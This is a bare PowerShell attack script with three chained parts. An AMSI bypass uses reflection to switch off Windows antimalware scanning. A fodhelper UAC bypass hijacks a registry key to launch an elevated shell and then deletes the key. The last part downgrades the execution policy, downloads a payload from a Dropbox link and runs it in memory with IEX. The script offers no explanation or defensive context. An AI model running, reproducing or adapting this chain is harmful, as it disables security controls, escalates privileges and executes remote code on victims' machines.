# amsi bypass $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Failed") {$f=$e}};$f.SetValue($null,$true) #uac bypass function FodhelperUACBypass(){ Param ( [String]$program = "cmd /c start C:\Windows\System32\cmd.exe" #default )   #Create Registry Structure New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force   #Start fodhelper.exe Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden   #Cleanup Start-Sleep 3 Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force   } #execution bypass Set-ExecutionPolicy -Scope CurrentUser Unrestricted -Force $payload = 'https://www.dropbox.com/scl/fi/h8z390ao5g3fmdfxudst2/Bz9NJCXXZg2UNZLPday5DH.exe?rlkey=rd56pvdvevmq0r0rjgl1zibf4&st=ijecvfz8&dl=1' $p1 = (New-Object Net.Webclient).DownloadString($payload); IEX $p1